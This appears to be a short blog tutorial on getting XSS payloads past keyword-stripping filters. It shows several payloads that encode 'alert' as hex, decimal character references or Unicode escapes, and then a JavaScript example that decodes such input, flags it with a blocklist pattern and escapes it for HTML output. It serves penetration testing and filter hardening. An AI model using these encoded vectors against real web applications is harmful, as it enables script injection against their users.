WHAT IS ENCODING?

Encoding is the process of converting data from one form to another using a publicly available scheme, so that it can easily be reversed.

THE PROBLEM

Sometimes you are able to inject your favorite payloads, but the JavaScript functions/actions in them are being stripped or removed.

For example:

"><img src=x onerror=alert(1)> returned as "><img src=x onerror=(1)>

THE SOLUTION

You may try encoding it to Hex, ASCII code or Unicode entities.

Payload:

test <a href=jav&#x61scr&#x69pt:&#x61le&#x72t(1)>Click me</a> – HEX

test <img/src=x onerror=&#97le&#114t(1)> – ASCII code

test <h1/onmouseover='\u0061\u006c\u0065\u0072\u0074(1)'>hover over text – Unicode

You can mix up the encoding and it’ll still work.

test <h1/onmouseover='\u0061&#108e\u0072t(1)'>hover over text. – mixture of HEX, ASCII and Unicode
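
Seen from the filtering side, these vectors get through because the filter matches the raw string, while the browser decodes character references and \u escapes before the handler runs. The following is an added example (not code from the original post; all function names and the rule set are hypothetical) in which a keyword-stripping filter misses all four vectors, a check on the decoded form catches them, and output encoding renders them as plain text:

```javascript
// Added example, not from the original post; all names here are hypothetical.

// The kind of filter the post describes: it removes one literal keyword.
function naiveStrip(input) {
  return input.replace(/alert/gi, "");
}

// Map a code point to a character, tolerating out-of-range values.
function safeChar(cp) {
  return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\uFFFD";
}

// Decode numeric character references (hex and decimal, ';' optional) and
// JavaScript \uXXXX escapes, repeating until the string stops changing.
// Covers only the three encodings on this page; it is not a full HTML parser.
function canonicalize(input, maxRounds = 5) {
  let current = input;
  for (let i = 0; i < maxRounds; i++) {
    const next = current
      .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => safeChar(parseInt(h, 16)))
      .replace(/&#([0-9]{1,7});?/g, (_, d) => safeChar(parseInt(d, 10)))
      .replace(/\\u([0-9a-f]{4})/gi, (_, h) => safeChar(parseInt(h, 16)));
    if (next === current) break;
    current = next;
  }
  return current;
}

// Constructed, deliberately small rule set, applied to the canonical form.
const BLOCKED = /javascript:|alert\s*\(/i;
function flagged(input) {
  return BLOCKED.test(canonicalize(input));
}

// The actual fix for HTML text output: encode so the input renders as text.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// The four vectors from this page, kept byte-for-byte with String.raw.
const SAMPLES = [
  String.raw`test <a href=jav&#x61scr&#x69pt:&#x61le&#x72t(1)>Click me</a>`,
  String.raw`test <img/src=x onerror=&#97le&#114t(1)>`,
  String.raw`test <h1/onmouseover='\u0061\u006c\u0065\u0072\u0074(1)'>hover over text`,
  String.raw`test <h1/onmouseover='\u0061&#108e\u0072t(1)'>hover over text.`,
];
for (const s of SAMPLES) console.log(naiveStrip(s) === s, flagged(s), escapeHtml(s));
```

A blocklist on the decoded form is still only a detection aid; context-aware output encoding is what stops the markup from being interpreted.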

Useful Link/s:

https://www.branah.com/ascii-converter (remove 0 for HEX encoding e.g: “t” -> “0x74” -> “x74”)

https://www.branah.com/unicode-converter (ASCII codes are in Decimal representation)

Reference/s:
https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/
